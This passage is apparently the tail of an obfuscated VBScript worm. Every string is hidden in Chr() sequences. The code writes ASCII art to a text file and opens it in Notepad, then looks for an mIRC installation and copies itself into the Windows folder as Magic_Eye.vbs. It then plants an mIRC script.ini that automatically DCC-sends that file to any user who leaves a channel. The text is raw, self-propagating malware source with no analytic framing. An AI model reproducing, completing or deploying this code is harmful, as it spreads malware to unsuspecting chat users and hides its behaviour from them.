vx.writeline(Chr(32) & Chr(32) & Chr(39) & Chr(46) & Chr(46) & Chr(58) & Chr(58) & Chr(58) & Chr(58) & Chr(39) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(58) & Chr(58) & Chr(39) & Chr(46) & Chr(73) & Chr(73) & Chr(72) & Chr(73) & Chr(73) & Chr(58) & Chr(58) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(58) & Chr(73) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(39) & Chr(58) & Chr(58) & Chr(39) & Chr(32) & Chr(46) & Chr(39) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(39) & Chr(58) & Chr(58) & Chr(46) & Chr(58) & Chr(39) & Chr(32) & Chr(46) & Chr(39) & Chr(39) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(58) & Chr(73) & Chr(73) & Chr(72) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(34) & Chr(39) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(58) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(73) & Chr(72) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(39) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(34) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(44) & Chr(44) & Chr(46) & Chr(46) & Chr(46) & Chr(45) & Chr(58) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(39) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(73) & Chr(73) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(73) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(73) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(39) & Chr(32) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(46) & Chr(39) & Chr(39) & Chr(58) & Chr(46) & Chr(58) & Chr(32) & Chr(73) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(73) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(39) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(58) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(39) & Chr(46) & Chr(39) & Chr(73) & Chr(39) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(46))
vx.writeline(Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(58) & Chr(58) & Chr(46) & Chr(58) & Chr(73) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(39) & Chr(39) & Chr(46) & Chr(39) & Chr(39))
vx.writeline(Chr(32) & Chr(32) & Chr(39) & Chr(46) & Chr(39) & Chr(58) & Chr(58) & Chr(39) & Chr(73) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(39) & Chr(32) & Chr(32) & Chr(46) & Chr(39) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(34))
vx.writeline( Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(39) & Chr(46))
vx.writeline(String(8,Chr(32) ) & Chr(58) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46))
vx.writeline(String(8,Chr(32)) & Chr(58) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(58) & Chr(58) & Chr(46) & Chr(46) & Chr(58) & Chr(32) & Chr(32) & Chr(46) & Chr(32) & Chr(46) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(58) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(58) & Chr(46) & Chr(46) & Chr(32) & Chr(46) & Chr(32) & Chr(32) & Chr(32) & Chr(32) & Chr(46))
vx.Close
Set Shell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
Shell.Run(Chr(110) & Chr(111) & Chr(116) & Chr(101) & Chr(112) & Chr(97) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101) & Chr(32) & Chr(99) & Chr(58) & Chr(92) & Chr(65) & Chr(86) & Chr(80) & Chr(46) & Chr(116) & Chr(120) & Chr(116))
Set mIRC = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
Set Win = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
Set ion = Win.GetSpecialFolder(0)
If (mIRC.FileExists(Chr(68) & Chr(58) & Chr(92) & Chr(80) & Chr(114) & Chr(111) & Chr(103) & Chr(114) & Chr(97) & Chr(109) & Chr(32) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(115) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(46) & Chr(105) & Chr(110) & Chr(105))) Then Infect = Chr(68) & Chr(58) & Chr(92) & Chr(80) & Chr(114) & Chr(111) & Chr(103) & Chr(114) & Chr(97) & Chr(109) & Chr(32) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(115) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92)
If (mIRC.FileExists(Chr(68) & Chr(58) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(46) & Chr(105) & Chr(110) & Chr(105))) Then Infect = Chr(68) & Chr(58) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92)
If (mIRC.FileExists(Chr(67) & Chr(58) & Chr(92) & Chr(80) & Chr(114) & Chr(111) & Chr(103) & Chr(114) & Chr(97) & Chr(109) & Chr(32) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(115) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(46) & Chr(105) & Chr(110) & Chr(105))) Then Infect = Chr(67) & Chr(58) & Chr(92) & Chr(80) & Chr(114) & Chr(111) & Chr(103) & Chr(114) & Chr(97) & Chr(109) & Chr(32) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(115) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92)
If (mIRC.FileExists(Chr(67) & Chr(58) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(46) & Chr(105) & Chr(110) & Chr(105))) Then Infect = Chr(67) & Chr(58) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92)
If (mIRC.FileExists( ion & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(46) & Chr(105) & Chr(110) & Chr(105))) Then Infect = ion & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92)
If (mIRC.FileExists( ion & Chr(92) & Chr(80) & Chr(114) & Chr(111) & Chr(103) & Chr(114) & Chr(97) & Chr(109) & Chr(32) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(115) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(46) & Chr(105) & Chr(110) & Chr(105))) Then Infect = ion & Chr(92) & Chr(80) & Chr(114) & Chr(111) & Chr(103) & Chr(114) & Chr(97) & Chr(109) & Chr(32) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(115) & Chr(92) & Chr(109) & Chr(105) & Chr(114) & Chr(99) & Chr(92)
if infect = "" then Exit sub
Set fx = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
Set Cpy = fx.GetFile(WScript.ScriptFullName)
Cpy.Copy(ion & Chr(92) & Chr(77) & Chr(97) & Chr(103) & Chr(105) & Chr(99) & Chr(95) & Chr(69) & Chr(121) & Chr(101) & Chr(46) & Chr(118) & Chr(98) & Chr(115))
Set IRC = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
Set Fi = IRC.CreateTextFile(Infect & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(105) & Chr(110) & Chr(105), True)
Fi.WriteLine(Chr(91) & Chr(115) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(93))
Fi.WriteLine( Chr(110) & Chr(48) & Chr(61) & Chr(111) & Chr(110) & Chr(32) & Chr(49) & Chr(58) & Chr(80) & Chr(65) & Chr(82) & Chr(84) & Chr(58) & Chr(35) & Chr(58) & Chr(32) & Chr(105) & Chr(102) & Chr(32) & Chr(40) & Chr(32) & Chr(36) & Chr(109) & Chr(101) & Chr(32) & Chr(33) & Chr(61) & Chr(32) & Chr(36) & Chr(110) & Chr(105) & Chr(99) & Chr(107) & Chr(32) & Chr(41) & Chr(32) & Chr(123) & Chr(32) & Chr(47) & Chr(100) & Chr(99) & Chr(99) & Chr(32) & Chr(115) & Chr(101) & Chr(110) & Chr(100) & Chr(32) & Chr(36) & Chr(110) & Chr(105) & Chr(99) & Chr(107) & Chr(32) & lcase(ion) &  Chr(92) & Chr(77) & Chr(97) & Chr(103) & Chr(105) & Chr(99) & Chr(95) & Chr(69) & Chr(121) & Chr(101) & Chr(46) & Chr(118) & Chr(98) & Chr(115) & Chr(32) & Chr(125))
Fi.Close
End Sub
